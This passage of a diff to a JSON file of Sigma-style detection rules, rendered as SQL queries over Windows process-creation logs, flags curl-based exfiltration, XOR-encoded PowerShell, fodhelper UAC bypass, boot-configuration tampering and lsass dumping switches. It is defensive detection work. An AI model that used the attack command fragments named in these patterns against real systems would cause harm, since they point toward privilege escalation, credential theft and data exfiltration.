'%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentProcessName LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", - "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "status": "test", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.exfiltration", + "attack.t1567", "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", - "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", "tags": [ - "attack.execution", + "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate use by administrator" + "attack.t1542.003" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_bcdedit_susp_execution.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" @@ -17437,3634 +17330,3802 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", - "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "status": "test", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "status": "test", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", + "tags": [ + "attack.execution", + "attack.t1059.001" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' 